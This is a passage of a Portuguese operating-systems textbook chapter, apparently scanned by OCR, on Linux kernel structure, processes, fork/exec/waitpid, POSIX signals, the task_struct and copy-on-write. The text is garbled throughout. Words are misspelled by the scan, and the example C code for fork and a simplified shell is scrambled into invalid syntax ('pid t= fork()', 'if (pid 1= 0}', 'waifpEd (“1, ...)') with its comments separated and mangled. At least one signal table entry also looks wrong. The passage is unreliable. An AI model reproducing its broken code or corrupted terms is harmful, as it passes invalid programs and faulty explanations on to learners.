gina de ca che na memória principal. Alguns arquivos po- 
dem ate ser dinamicanieme criados e possuir sonie me urna 
representacao na memória, como os arqinvos que ofere- 
cem algunia informaęao dc uso dc recurso em tempo de 
cxccuęao. Alcm disso r o sistema dc memória virtiml pode 
rccorrer a u ma partięao dc disco ou a alguma area de troca 


de arquivos para criar cópias de paries da memória princi¬ 
pal quando for necessario liberar dętemu nadas paginas e, 
assirn, eonfia no dispositivo de E/S. Existem diversas outras 
interdependendas. 

Al e ni dos componentes estaticos no nudeo, o Limu da 
suporte a módulos dinamica nieme carregavds que pod cm 
ser utilizados para adicionar ou substituir drivers-padrao de 
dispositivos, sistemas de arquivos, redes ou outros códigos 
de nucleo. Os módulos nao sao mostrados na Figura 10.2. 

Por firn, bem no topo esta a interface de cliamadas de sis- 
tema ao nucleo, Todas as chamadas vao ate essn area, o que 
causa um desvio que modtfka a cxecuęao do modo usua- 
rio para o modo nucleo protegido e repassa o controle para 
um dos componentes do module dcscritos aiiteriormcntc* 


10.3 


Processos no Linux 


Nas scęóes anteriores, comeęamos a abordar o Linnx 
do potno de vista do teclado, isto e, aąuilo que o usuario 
ve atraves dc uma janda com ojtferm, Demos exemplos dc 
comandos do shell e prograrnas utilitarios freguentemenie 
usados. Finalizanios com uma visao rapida da estrutura do 
sistema. Agora diegou o momeniode aprofundarrnas hos¬ 
so estudo sobrc o nucleo c os conceitos basicos do que o 
Unux da suporte, como processos, memória, sistema de ar- 
quivos e ciura da/saida. Essas noędes sao imporlantes por- 
que as chamadas de sistema — a interface ao sistema ope- 
racional propriamenie dito — iratam delas. Por exempio, 
exisiem chamadas de sistema para criar processos, alocar 
memória, abrir arquivos e fazer E/S. 

Infdizmente, como exisiem mu i ta s versoes do Linux r 
ha, consequentcmente, algunias difcrcnęas entre clas. 


Chamadas de sistemas 


Componentes E/S 


Sistema de arquivos virtual 


Terminal s 

Soquetes 
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Drivers de 
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i Figura 10*2 Estrutura do nucleo do Linux, 
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Neste capituio, enfatizaremos as caracieristicas comuns a 
todas elas em vez de nos concentrarmos em uma versao 
esperifica. Assim, em certas seęoes (espedalmente as de 
implementaęao), a discussao pode nao se aplicar a qual- 
qncr versao, 

10-3.11 Conceitos fundamentais 

As prinripais entidades aiivas no Liiuix sao os proces¬ 
sos, muiio similares aos processos seąucndais classicos quc 
estudamos no Capilulo 2. Gada processo executa um linko 
pr ogra ma e inidalrncnie lem um unico ihrcad de conirole. 
Em omras pa!avra$, cle possui um unico coniador de pro- 
grama, quc guarda o caininho da próxima instmęao a ser 
cxccutada. Muitas vcrsoes do Linux pcfmiLemquc um pro¬ 
cesso crie outros threads depois de imcializar sua execuęao, 

O Linux e um sistema muhiprogramado, dc modo 
que multiplos processos independcntcs podem executar 
ao mesmo tempo. Alćm disso, ca da usuario pode ter va- 
rios processos alivos de uma só vcz c, assim, em um gran¬ 
dę sistema, e posswel haver centenas ou talvez milhares de 
processos execulando, De lato, na maioria das esiaęoes 
de trabalho de um unico usuario, mesmo que o usuario 
csteja ausenie, imiitos processos, chamados de daemons, 
cstao executando em segundo piano. Esses processos sao 
iniciados auiomaiicamente quando o sistema e iruclaliza- 
do. {'Daemon' e uma ortografia variante dc * demon um 
espfrito do mai autonomo.) 

Um daemon tfpico e o cron. Ele acorda uma vez por 
minuto para verificar se existe algum trabalho para fazer. 
Caso exista, de faz o trabalho. Depois, ele volta a dormir 
ate o momemo da próxima verifkaęao. 

Hsse daemon e necessario porque o Linux permite 
agendar atividades para serem executadas minutos, horas, 
dias ou mesmo mcses depois. Por exemplo, suponha que 
um usuario lenka uma consulta com um denlista na pró- 
xima teręa-feira, as 15h. Ele pode inserir uma enirada na 
base dc dados do daemon cron, solicitando quc da ernita 
urn som de alarrne — digamos, as 14h3Q da tarcie. Quando 
o dla e a hora agendados chogarem, o daemon cron per¬ 
ce bera que tern trabalho a fazer e atieara o programa que 
emite som como um novo processo. 

O daemon cron lambem ć usado para cxecutar alivi- 
dades periódicas, como realizar backups do disco diaria- 
mente as ąuatro da manha ou, todos os a nos, lembrar a 


usuarios esquecidos que, no dia 31 de outubro, e preciso 
guardar doces para o Dia das Bruxas. Ouiros daemons tra- 
tam as mensagens eleiromćas que chegam c que saem, 
gerenciam a fila da impressora de linka, vcrificam a quan- 
tidadc dc paginas na memória c assim por diantc. Dac- 
mons sao sini pies dc impkmentar no Linux porąue cada 
um 6 um processo separado, Independenlemente de todos 
os demais processos. 

No Lintix os processos sao criados de um jcito bastantc 
simplcs. A diamada de sistema fork cria uma cópia cxata do 
processo original. O processo criador e cha ma do de pro¬ 
cesso pa i. O novo processo e chamado de processo filho. 
Cada um lem sua própria i ma gem da memória privada. Se, 
após a criaęao, o pai alterarsuas variaveis, essas alteraęóes 
nao sera o visiveis peio processo filho e viee-ver$a* 

Os arquivos abertos sao compartilhados entre o pro¬ 
cesso pai e o processo filho. O u seja, se um certo arquivo 
estava aberto no pat, antes da chama da fork, ele coniinuara 
aberto em ambos os processos, pai e filho. Alteia^óes fei- 
las nesse arquivo sera o visfveis a ambos os processos, Esse 
comportamento e razoavel, pois essas alteraęóes sao, da 
mesma maneira, visiveis a qualquer processo nao relacio- 
nado que abre o arquivo. 

O falo de as imagem da memória, as variavcis, os rc- 
gistradores e ludo o mais serem identicos tanio no processo 
pai quanto no processo filho gera uma pequena dificulda- 
de: como permjtir que os processos saibam quem deve exe- 
cutar no código do pai e qucm deve executar no código do 
filho? 0 segredo e que a cha mada de sistema fork retorna 
0 para o filho e um valor nao nulo — o PIO (idcmifica- 
dor de processo) — do processo filho para o processo pai, 
Ainbos os processos costumam vcrifkar o valor retornado 
e, assim, podem agir diferentememe, como mostrado na 
Figura 10.3. 

Os processos sao idemifkados por seus PIDs. Quando 
um processo e cria do, o pai recebe <5 PiD do filho, como 
mencionado. Se o filho quer saber sen próprio PID, existe 
uma chamada de sistema, getptd, que o fornece. Os PIDs 
sao usados de diferentes maneiras. Por exemplo, quando 
um processo filho ter mi na, o pai recebe o PID desse pro¬ 
cesso lii ho. Isso c importante ąuando um processo pai tem 
muitos filhos. Visto que os filhos lambem podem ter fdhos, 
um processo original pode construir uma arvore imeira de 
filhos, tieios e descendentes mais distantes. 


pid = fork(); 
if (pid < 0) f 

handle_error (); 
} efse if (pid > 0} { 

} else ( 

1 


T se o fork tiver óxito n o processo pai obtera pid > 
r o fork falhou (por exemplo ? a memória ou alguma tabela estś che i a) 7 
r código do pai segue aqui./7 
f* código do filho segue aquL/ 7 


I Figura 10.3 Criaęao de processo no Linux. 
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Os processos no Linux apresentam a proprledade de se 
comunicar entre si usando um lipo de troca de mensagens. 
Ć possfael criar um canal entre dois processos no qual um 
deles pode escrever um fluxo dc hytes para o outro len Es- 
ses canais sao chamados pipes. A sincronizaęao ć possfvcl. 
porąue, ao tentar ler uma entrada do pipę, um proccsso e 
bloąueado ate que o dado esteja dispomvd. 

Os pipelines do shell sao implememados com pipes. 
Quando o shell recebe uma linha do lipo 

sort <f | head 

ele cria dois processos, sen e head, e tria um pipo entre des 
dc modo que a sarda-padnie de son seja conectada a entra- 
da-pa dra o dc head, Dcssa marsem todos os dados qu tson 
cscrever irao direiamentc para head, em vez de ir para um 
arquivo. Se o pipę satura, o sistema para a exeaięao de son 
ale que head tenha removido algum dado do pipę. 

Os processos tambem podem se com u ni car de outra 
maneira: usando interrupęóes de software, Um proccsso 
pode enviar um sina! para outro proccsso, Os processos 
podem di zer ao sistema o que des querem que ocorra 
quando um sina] e recebido. As opęocs sao ignorado, cap- 
lurado ou deixar o sinal matar o proccsso (o convenrional 
para a maioria dos sinais). Se um proccsso dccide captu- 
rar os sinais eiwiados a etc, dcvc definir um procedimenlo 
para iratamento dos sinais. Quando um sinal e recebido, o 
conlrole e abruptameme transferido para o Lratador. Quan- 
do estc finaliza e retorna, o conlrole volta para onde cle 
estava, como o tratamenio de interrupęóes de E/S via hard¬ 
ware. Um proccsso pode enviar sinais somente para mern- 
bros de sen grupo de processos, que consiste dc seu pai 
(e anccstrais mais distanies), irmaos e filbos {e descendcn- 
les mais distantes). Um proccsso tambem pode ermar um 


sinal para todos os membros de seu grupo de processos 
com uma unica cha mada de sistema. 

Os sinais tambem sao usados para out ras finalidades. 
Por cxcmplo, se um proccsso esia fazendo aritmetica de 
porno flutuante e inadvertidameme realiza uma divisao 
por 0, eie recebe um sinal S1GFPE (exceęao de porno Hu¬ 
manie). Os sinais exigidos pdo POSJX estao defmidos na 
Tabela 10.2. Muitos sistemas Linux trabalham com outros 
sinais alem desses, mas os próg rama s que usarcm esses si¬ 
nais adicionais nao serao portateis para o u tras versóes de 
Linux e UNJX cm geraL 

10.5.21 Chamadas de sistema para 

gerenciamento de processos no 
Linux 

Vamos agora conhecer as chamadas de sistema do Linii x 
quc tratam do gerenciamento dc processos, As principais sao 
reladonadas na Tabela 10.3. A cha mada fork e um bom nudo 
de discussao. Fork, que fundonc tambem nos outros sistemas 
UN1X tradidonais, e a principal maneira de criar um novo 
proccsso nos sistemas Linux (vamos di seu tir outra alterna- 
tiva na próximo seęao}. Essa chamada gera uma duplicata 
exata do proccsso original, induindo todos os descritores de 
arquivos, registradores e mdo o mais. Após o fork, o proces- 
so original e a cópia (o pai e o HI ho) seguem por caminhos 
separados, Todas as variavds lem valores identicos aqudes 
do momenlo da cxecuęao do fork, mas, visto que a imagem da 
memória do pai e eopiada para criar o filho, as alteraęoes 
subseąucntes em um deles nao afeiam o outro. A chamada 
fork retoma um valor, que e zero no filho e igual ao PID do 
filho no pai. Usando o PID retorna do, os dois processos po¬ 
dem saber quem ć o pai e qucm e o filho. 


Sinal 

Efeito 

SIGABRT 

Envfado para abortar um processo e loręar o despefo de memória (core dump) 

SIGALRM 

0 relógio do alarme disparou 

SIGFPE 

Ocorreu um erno de ponto flutuante (por eKempio, divisao por 0) 

SIGHUP 

A linha telefonica que o processo estava usando caiu 

S1GILL 

O usuario pressionou a tecla DEL para interromper o processo 

SIGOUIT 

0 usuśho pressionou uma tecla aolicitando o despejo de memória 

SIGK1LL 

Envlado para matar um processo (nao pode ser capturado ou ig no rado) 

S1GPIPE 

0 processo escreveu em um pipę que nao tern Jetaes 

S!GSEGV 

0 processo referenciou um endereęo de memória tnvślido 

SIGTERM 

Usado para requisitar que um processo termine elegantemente 

SIGUSR1 

Disponive] para propósitos definidos pela aplicagao 

SIGUSR2 

Disponlvel para propósitos definidos pela aplicaęao 


i Tabela 10.2 Sinais exigidos pelo POSIX. 
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Chamada de sistema 

Descrięao 

pid = fork() 

Cria urn processo filho id&ntico ao pai 

pid = waitpid(pid f &statloc, opis) 

Espera o processo filho terminar 

s = execve(name, argv, envp) 

Substitui a imagem da menrtória de um processo 

exit(status) 

Termina a execuęao de um processo e netorna o status 

s = sigactionfsig, &act, &oidact) 

Definc a aęao a ser tornada nos sinais 

s = sigreturn[&context} 

Retorna de um sinal 

s = stgprocmask(how, &set, &old) 

Exarnina ou modifica a mascara do sinal 

s - sigpending(set) 

Obtem o conjunto de sinais bloqueados 

s = sigsuspendfsśgmask) 

Substitui a móscara de sinal e suspende o processo 

s = killfpid, sig) 

Envia um sinal para um processo 

residual = alarm(seconds) 

Aj usta o relógio do alarme 

s = pause[) 

Suspende o chamador ató o próximo sinal 


I Tabela 10.3 Alg u mas chamadas ao sistema relactonadas com processos. O código de retorno se~1 quando ocorre um erra, pić ó 
o ID do processo e residua! e o tempo restante no alarme anterior, Os parśmetros sao agueles sugeridos pelos próprios nomes. 


Na maioria dos casos, após mn fork, o filho precisa 
executar um código diferente do código do pai. Considere 
o caso do shdl que le um comando do terminal, cria um 
processo filho, espera ate que o filho execnte o referido 
comando e, depois quc o filho termin a, le o próximo co¬ 
mando, Para espera r o filho ter mi nar, o pai executa urna 
chama da de sistema, waitpid, que simplesmente espera 
o filho terminar (qualquer filho, caso exista mais do que 
urn). Waitpid tem tres paramelros. O primeiro permite que 
o cliamador espere por um filho especifico. Se o valor dele 
e -1, qualquer filho anLigo (isio e, o filho que terminar 
primeiro) servira. O segundo parametro e o endereęo de 
urna variavel que sera ajustada com o status de termino 
do filho (termino normal ou anormal e valor de retorno). 
O terceiro parametro deiemiina se o chamador deve ou 
nao ser bloqueado caso nenhum filho teriha termiiiado. 

No caso do shell o processo filho deve execuiar o 
comando digilado pelo usuario. Ele faz isso por meio da 
chama da de sistema exec, que substitui loda a sua imagem 
ua memória pelo arquivo indkado no primeiro parametro da 
chamada. Um shell extr emanie nte simplificado e most ra¬ 
do na Figura 10.4 ilustrando o uso de fork, waitpid e exec. 

No caso mais geral, exee tem ires paramelros: o nome 
do arquivo a ser execmado, um pomeiro para um vetor dc 
argumentos e um pontdro para um vetor de variavds dc 
ambiente. Eles serao descritos rapidameme. varios proce- 
dimentos de biblioteca, como exed, execv f exęcłe e execve, sao 
fornecidos para permitlr que os paramelros sejam omitidos 
ou especificados de varias maneiras. Todos esses procedi- 
mentos invocam a mesma cha ma da de sistema su bja cen¬ 
ie, Embora a chama da dc sistema seja exec, nao existc ne¬ 
nhum procedimento de bibtioieca com esse nome; um dos 
ouiros deve ser usado. 


Vamos considerar o caso de urn comando digilado no 
shell, como 

cp file 11ile2 

empregado para copiarfikl em fik2. Após o shdl ter criado 
um filho, esic localiza e cxccuia o arquivo cp, passando a 
dc informaęoes sobrc os arquivos a serem copiados, 

O programa principal de cp (e de muitos outros progra- 
mas) contem a dedaraęao dc funęao 

mainfarge, argv, envp) 

cm quc ar$c c um contador do numer o de itens da lin ha dc 
comando, induindo o nome do programa. Para o exemplo 
a ci ma, mjc e 3. 

O segundo parametro, argy, e um ponteiro para um 
vetor. O elementu i do vetor e um ponleiro para a Aesima 
cadeia de caraderes da linha de comando. Em nosso exem- 
plo, f?r^v[0] apontaria para a cadeia 'cp'. Da mesma manei- 
ra, ar§v[ 1 ] apontaria para a cadeia dc 5 caracteres 'fileU e 
argv[ 2] aponta para a cadeia de 5 caracteres 1ilc2\ 

O terceiro parametro de main, envp, e um pomeiro 
para o vetor de variaveis amhiemais, contendo cadeias 
na forma de associaęoes do tipo nome - vaior usadas para 
passar informaęoes como o tipo de terminal c o nome do 
diretório-raiz dc um programa. Na Figura 10.4, nenhum 
vctor dc variavds ambkntais c passado para o filho, pois o 
terceiro parametro dc execvc e zero nesse caso. 

Se exec parece complicado, nao se desespere; de e a 
mais complexa chamada de sistema. Todas as demais sao 
hem mais simples. Como exemplo de urna simples, consi- 
dere a chamada exit, que os processos devem usar quando 
finałizam a cxecuęao. Ela tem um parametro, o status de 
salda (Q a 255), quc e retomado ao processo pai na variavel 
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while (TRUE) { 

type_proEnpt(); 

read_command(comnnand, params); 

pid t= fork(); 

if (pid < 0) { 

printff Unable to forkO); 
continua; 

} 

if (pid 1= 0} { 

waifpEd (“1, & status, 0); 

} eise { 

ejcecye^commaiid, pararms, 0); 

} 

} 

1 Figura 10.4 Um Shell altamente simplificado. 

status da cha mada de sistema waitpid, O byle de menor or¬ 
dę m de status contem o estado de len ni no do processo, com 
0 mdicando Lenni no norma! e outros valores indicando va- 
rias condięóes de erro. O byte de maior ordem contem o 
status de safda do filho (0 a 255), tal como especificado 
pelo fillio na chamada a exit. Por exemplo, se um processo 
pa i executa o cornando 

n = waitpid(-1, &status, 0); 

cle sera suspenso atć o proce sso fillio terminar. Sc o filho 
termi na com 4, por exempio, sendo o para metro de exit f o 
pai sera acordado com u comendo o PID do filho c status 
comendo 0x0400 (0x como prefixo sigm lica hexadccimal 
em C). O byle de menor ordem de status relaciona-se a si¬ 
nais; o seguime e o valor que o filho retornou em sna cha- 
mada a exit, 

Sc um proccsso sai (exit) e scu pai ainda nao entrou cm 
estado de espera por ele, o processo emra em um lipo de 
animaęao suspensa, chamada de estado zumbi. Quando 
o pai finał menie entra no estado de espera pelo filho, o 
processo termin a, 

Varias chamadas de sistema relacionam-se a sinais e 
sao empregadas diferenLemenie* Por exemplo, se um usua- 
rio, por acideme, pedir a um editor de iexio para mostrar 
todo o comendo de um arquivo muito longo e, entao, 
ocorrer um erro, de algum modo o editor deve ser imer- 
rompido. Em geral, o usuario tein de pressionar algunia 
tecla cspecial (por exemplo, DEL ou CTRL-C), quc envia 
lim sinal para o editor. Esic Gipiura o sinaI c imerrompc a 
apresentaęao. 

Para sc dispor a capturar esse sinal (ou qualquer ou- 
no), o processo pode usar a chamada de sistema sigaction. 
O primdro parametro e o sinal a ser cap tura do (veja a Ta¬ 
bela 10.2). O segundo e urn pontciro para inna estru tura 
quc forncce um ponleiro para o proccdimento tratador dc 
sinal, alem de alguns outros bits e flags. O terceiro paranie* 
tro aponla para u ma estru tura em que o sistema retorna 


r repete para sempre /7 
t mostra o prompt na tela 7 
r te a linha de arkada do teefado 7 

r cria um processo filho 7 

r condięaode erro 7 
/* repete o laęo 7 


/' pai espera o filho 7 
i* filho frazo tra bal ho 7 


mformaęoes sobrc o tratamento de sinais quc csia sendo 
atual menie empregado, no caso dc cle pretisar ser restau- 
rado posieriormenie* 

O tratador de sinais pode executar duranie o tempo 
que quiser, embora, na pralica, os iraiadores de sinais ge- 
ralmentc sejam pequenos. Quando o proccdimento de tra- 
tamento dc sinais c eon chudo, ele retorna para o porno cm 
que fol interrompido. 

A chamada de sistema sigaction lambem serve para fa- 
zer com que um sinal seja ignorado ou para restaurar a 
aęao-padrao, que e ma tar o processo. 

Pressionar a tecla DEL nao e a unica maneira de enviar 
um sinal A chamada de sistema ki permile que mu processo 
sinalize outro processo relacionado. A escolha do nome 'kilT 
para essa chamada de sistema nao e exatamente boa, visto 
que a maioria dos proccssos eiwia sinais para outros proces- 
sos com a intenęao de que eles sejam capiurados. 

Cm muitas aplicaęoes dc tempo rcal, um processo pre- 
cisa ser interrompido após um intervaIo dc tempo espeeffi- 
co, a firn de fazer algo como retransmitir um pacoteperdido 
por uma linha de comunicaęao nao confiavel, Para iratar 
essa situaęao, fol deseńvolvida a chamada de sistema alarm* 
O parametru especifica um intervalo, em segundos, após o 
qual o sinal SIGALRM e eiwiado ao processo. Um processo 
pode ter semenie um alarme pendente em deierminado 
i ustanie de lempo. Se uma chamada alarm e feita com um 
parametro dc 10 s e, depois dc 3 s, uma omra chamada 
aiamn e feita com um parametro de 20 s, somerne um sinal 
sera geraclo, 20 s após a segunda chamada, O primciro sina] 
ć cancelado pela segunda chamada a alarm. Sc o parametro 
para alarm for zero, qualquer sinal pendente sera cancelado. 
Se um sinal de alarme nao e capi u rado, a aęao-padrao e 
ex ecu ta da e o processo sinalizado e mono. Te cnica menie, 
os sinais de alarme podem ser ignorados, mas isso e algo 
sem p ropo sit o. 

Algumas vczes deierminado processo nao tein nada 
para fazer ate que clieguc um sinal. Por excmpb, Lmagi- 
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ne nm programa de ensino auxiliado por computador qne 
esteja testando a veloddade de leitura e compreensao. Ele 
mostra algum texto na tela e depois chama alarm para sina- 
liza-lo após 30 segundos. Enąuanto o estudame esta lendo 
o tcxto, o programa nao tern nada para fazer. Ele poderia 
ficar iniitiL cm um laęo orioso, mas isso dcspcrdięaria tem¬ 
po dc CPU dc que um processo cm segundo piano ou outro 
usuario poderia precisar. Urna soluęao melhor e usar a cha- 
mada de sistema pause, que diz ao iinux para suspender o 
processo ale a ehegada do próximo sinal. 

_ 10.3.31 Implementaęao de processos no 

Linux 

Um processo no Urnuf e como um iceberg: aąuilo 
que voce ve e a pacie sobre a agua, mas Lambem exisie 
u ma parte Importante submersa. Cada processo apre- 
senta urna parte do usuario que cxecuia o programa do 
usuario. No emamo, ąuaudo um de sens threads faz urna 
cliarnada dc sistema, de iroca o modo dc cxecuęao e pas¬ 
sa a exccular no contexlo do nudeo, com um diferente 
mapa de memória c acesso toial a todos os rccursos da ma- 
quina f Embora eon Lin u c sen do o mesmo thread, agora de 
tern mais pod er e lambem sua p ropna pilha e seu próprio 
co n ta do r de programa no modo nudeo. Esscs rccursos sao 
importanies porque u ma cha mada de sistema pode ser blo- 
queada ale que u ma operaęao de disco se complcic, por 
cxemplo. O comador de programa e os registradores sao, 
emno, salvos, de modo que o thread possa ser reinidado no 
modo nudeo posieri ornie me. 

O nudeo do Linux representa osprocessos internamen¬ 
ie como tarę fas, por meto da estru mra mskjtruct. Ao con- 
trario dc om ras abordagens de sistemas opcracionais, que 
razem distinęao enire processos, processos lcves e ihrcads, 
o Linux uiiliza a esirutura de tarefas para representa rqual- 
quer contexto de exccuęao. Portanto, um processo com um 
li nico thread sera representado por urna estru tura dc tarefas, 
enquanto um processo com mii Kipi ós ihrcads tera u ma es¬ 
tru tura de tarefas associada a cada ihrcad do nivel do usua¬ 
rio. Fiualnicnte, o nudeo em si possui multiplos ihrcads 
e ihrcads cm ntvcl dc nudeo que nao estao assodados a 
nenhum processo do usuario c quc executam códigos de 
nudeo. Yoltarcmos a talar sobre o iraiamenio de processos 
com multiplos ihrcads (c threads em geraj) mais adiante. 

Para cada processo, um descritor do lipo task_struct fica 
resideme na memória duranie todo o tempo. Ele contem 
informaęoes viiais para qtie o nudeo possa gerendar todos 
os processos e tarefas como o cscalonamcmo de pa ranie- 
tros, as li si as de descritores de arquivos abertos etc, O des- 
criior do processo e a memória da pilha do modo nudeo 
para o processo sao criados junto com o processo. 

Para manier a compatibilidade com oulros sistemas 
UNIX, o Linux identifica os processos por meio de um \dtn- 
tificador de processo (PIO). O nudeo organ i za todos os pro¬ 
cessos em uma lista duplameme encadeada de estruiuras 


de tarefas. Alern de avaliar os descritores por meio do cru- 
zaniemo das listas encadeadas, o P1D pode ser mapeado 
para o endereęo da esirutura de tarefas e a informaęao do 
processo pode ser promamenie recupcrada. 

A estru mra das tarefas comem diversos campos. Alguns 
deles ar maże nam ponteiros para outras estruiuras de dados 
ou segmemos, como os que contem informaęoes sobre ar- 
quivos abertos. Alguns desses segmemos estao relacionados 
a esirutura do mve.l do usuario do processo, o que nao e 
rdevantc ąuando o processo nao esta no estado executaveL 
Assim sen do, podem ser paginados ou colocados na arca de 
Iroca do disco para que nao haja desperdicio de memória 
com informaęoes desnccessarias. Por exemplo, embora seja 
posswel que um sinal seja enviado a um processo enquanto 
de esta no disco, nao e possivel que ele leia um arquivo. Por 
essa razao, a informaęao sobre sin ais deve estar sempre na 
memória, mesmo quando o processo nao esta presente. Por 
outro lado, a informaęao sobre descritores de arquivos pode 
ser a rm a zen a da na estru tura do usuario e recupcrada ape- 
nas quando o processo eslivcr na memória c cm cxecuęao, 

As informaęoes comidas na tabela de processos se en- 
ąuadram nas seguimes categorias: 

L Pariłmetros de escaionamento, Prioridade do 
processo, quantidade de tempo de CPU comunu¬ 
da recememente, quantidade de tempo gasto dor- 
mindo recentemente* Juntos, csses parametros sao 
usados para determinar qual processo sera o pró- 
ximo a executar. 

2, Imagem da memória, Ponieiros para os segmen- 
los de texto, dados e pilha ou, caso seja usada a pa- 
ginaęao, ponteiros para suas tabdas de paginas. Se 
o segmento de texio e compartiIliado, o pomeiro do 
código aponta para a tabela dc código comparliIlia¬ 
da, Quando o processo nao esta localizado na me¬ 
mória, informaęoes sobre como encontrar suas par- 
tes no disco tambem esiao na imagem da memória. 

3, Sinais, Mascaras que mostram quais sinais esrao 
sendo ignorados, quais estao sendo capturados, 
quais estao sendo bloqueados e quais estao em pro¬ 
cesso para serem entregues, 

4, Registradores de mdąuina, Quando ocorre um 
desvio de exccuęao (trap) para o espaęo do nudeo, 
os registradores da maquina sao salvos aqui (in- 
cluindo os de porno flutuarue, caso sejam usados). 

5, Estado da cha mad a de sistema. Informaęoes so¬ 
bre a chamada de sistema atual, inclnindo parame¬ 
tros e resultados. 

6, Tabela de descritor de arquivo. Quando ć feita 
uma chamada de sistema que envolva o descritor 
de arquivo, o descritor de arquivo c usado como um 
fndice para essa tabela, a (im de localizar a estrutu- 
ra de dados na memória (i-nade) correspondente a 
esse arquivo. 
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7. Contabilidade. Pomeiro para unia tabela que guar- 
da o tempo de CPU usado pelo processo em modo 
usuario (user) e durante chamadas de sistema (sys- 
tm). AJguns sistemas tambem mantem aqui neste 
item da estrutura os limites sobrc a ąunntidadc dc 
tempo dc CPU quc um processo pode u san o tama- 
n ho maximo dc sua pil ha, o numero dc molduras de 
p agi na que de pode consumir e outros itens. 

8. Pilha do nucleo. Uma pil ha fixa a ser usada pela 
parte do nu cl co do processo, 

9 . Miscelanea, Esta do do processo atual, evento son¬ 
do esperado — caso exista —, tempo que resta ate 
disparar o relógio do alarmc, PID, PID do processo 
pai e identifkaęao de grupo e usuario. 

Tendo em mente o emprego dessas tabdas, agora e fa- 
cil explicar como os processos sao criados no Linux, pois o 
mecanismo realnienie ć bastante dii eto, Uma nova entrada 
da tabela de processos c area de usuario sao criadas para o 
processo filho e preenchidas principalmente com dados do 
pai. O filho recebe um PID, sen mapa de memória ć aj usta - 
do e recebe o direito de acesso compartilhado a os arquivos 
do pai. Entao, seus regisiradores sao ajusiados e esta promo 
para execuęao. 

Quando uma cha mada de sistema fork e executada, o 
processo chamador passa pora o modo nutleo e cria uma 
estrutura de tarefas e outras estruturas de dados, como a 
pilha do modo nu cle o e uma estrutura thmidjnfo. Essa es- 
trutura e alocada a uma distancia fixa no firn da pilha do 
processo e conteni poucos paranieiros, beni como o eude- 
reęo do descriior do processo. Armazenando o endereęo 
do descriior do processo em um local fixo, o Linux precisa 
semenie de algumas poucas operaęoes para localizar a es- 
trutura de tarefas para um processo em execuęao, 

A maioria dos eon te ud os de descritores de processos 
esta preenchida com base nos valores do descriior do pro¬ 
cesso pai. Entao, o Linux procura por um PID dispomvel 
e atualiza a en l rada na tabela de espalhamenlo do PID de 
forma que apome para a nova estrutura de tarefas. No caso 
de colisóes na tabela de espalhamenlo, os descritores dos 
processos podem ser encadeados. Os campos na task_strucl 
tambem sao configurados para que apontem para os pro¬ 
cessos anteriores/seguintes no veror de tarefas, 

Em princfpio, agora seria hora de alocar memória para 
os segmentos de dados e pilha do filho e de fazer uma có- 
pia compleia do espaęo de endereęamento, visio que a se- 
mantica do fork estabdece que nenhuma memória deve ser 
compartilhada entre pai e filho. Como e somente leitura, 
o segmento de texto pode ser copiado ou compartilhado. 
Nesse ponto, o filho esta pronto para ser ex centa do. 

Contudo, como copiar memória e mu i to cara, os sis¬ 
temas Llnux modernos nao seguem essa soluęao: eles en- 
tregam ao filho suas próprias tabelas de paginas, mas es- 
sas, por sua vcz, apontam apenas para as paginas do pai, 
marcadas como somente leitura, Scmpre quc o fi lho ten la 


escrever sobre uma pagina, ele obiem um erro de proteęao, 
O nucleo percebe essa tentaiiva e, entao, aloca uma nova 
cópia da pagina em ąuestao marcando-a com dircitos dc 
Idtura/escrita. Desse modo, somente as paginas quc sao 
realmente cscritas devem ser copiadas. Essc mecanismo e 
chamado de copiar-se-escrita {wpyon write). Ele possui a 
vaiitagem adicional de nao cxigir duas cópias completas do 
programa na memória, e co no mi za udo RAM dessa forma. 

Após o processo filho inicializar sua cxccuęao, o código 
exccu tando alt (uma cópia do shell) invoca uma chama- 
da de sistema exec, passa udo o nonie do comando como 
parameiro. O nucleo en tao encontra e verifica o arquivo 
executavel, copia os argument os e as variaveis de ambiente 
para o nucleo c libera o antigo espaęo de endereęamento e 
suas tabclas dc paginas. 

Agora, o novo espaęo de endereęamento deve ser cria- 
do e preenchido. Se o sistema da suporie a arquivos mapea- 
dos, como o Litiux e mu Kos outras sistemas UN1X, as novas 
tabelas de paginas sao ajustadas para indicar que nenhuma 
pagina esta na memória, cxccio taWczuma pagina de pilha, 
mas que o espaęo de endereęamento e resguardado pelo ar- 
quivo executavel no disco. Quando o novo processo i nicią 
sua execuęao, cle imediaiarneme causa uma falta dc pagina, 
fazendo com que a primeira pagina de código seja pagina- 
da do arquivo executavd. Desse modo, nao precisa ca n ega r 
nada antecipadamente e, assim, osprogramas podetii inicia- 
lizar rapidamente c falhar apenas naąudaS paginas de que 
eles predsam e em nenhuma outra (essa esirategia e pagi- 
naęao por demanda em sua forma mais pura, como discuti- 
do no Capftuio 3). Por firn, os argumentos e as variaveis de 
ambiente sao copiados para a nova pilha, os sinais sao rei- 
niciados e os regisiradores sao mieializados todos para zero* 
Nesse ponto, um uovo comando pode iniciar sua execuęao. 

A Figura 10,5 ilustra as etapas descritas anteriormeme 
por meio do seguinte exemplo: um usuario digtta um co¬ 
mando cm um terminal — digamos, Is—-o shell cria um 
novo processo igual a si próprio* 0 novo shell entao chama 
exec para sobrepor sua memória com os contcudos do ar- 
qisivo cxecutavd 1$. 

Threads no Linux 

Discmimos threads de mancira gcral no Capftuio 2. 
Agora vamos tratar dos threads de ruicleo no LInux, parli- 
cu lar mente focando nas diferenęas entre o modela do Li- 
nux e os de outros sistemas UNTX* Para entender melhor 
as capacidades linicas oferecidas pelo model o do Linux r 
comcęamos falando das difkeis dedsoes prcsentcs nos sis¬ 
temas com miiltiplos threads. 

A qucstao prindpal na apresentaęao dc threads ć a ma- 
nutenęao da semamica tradicional correia do UNIX. Pri- 
meiro, considere fork. Suponha que um processo que tenlia 
miiltiplos threads (de nucleo) faęa uma cha ma da de siste- 
ma fork. Todos os seus threads devem ser criados no novo 
processo? Por cuquanto, vamos responder que si m* Su po- 
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Aloca entrada na tabela de processo do filho 
Preenche entrada do filho com dados do pai 
AEoca pilha e area de usuario para o filho 
Preenche a area de usuario do filho com dados do pai 
Atoca PID para o filho 
A|usta filho para com partii ha r cod i go do pai 
Copia labelas de paginas para dados e pilha 
Ajusta com parti Ihamento de arquivos abertos 
Copia registradores do pai para o filho 


Encontra o próg rama executavel 
Verifica a permissao de execugao 
Li e yerifica o cabeęalho 

Copia argumentos e variaveis de ambiente para o nudeo 

Libera o antigo espaęo de endereęamento 

Aloca novo espaęo de endereęamento 

Copia argumentos e variaveis de ambiente para a pitha 

Reinicializa os sinais 

Iniciatiza os registradores 


I Figura 10.5 Passos na execuęao do comantfo (s diglrado no Shell. 


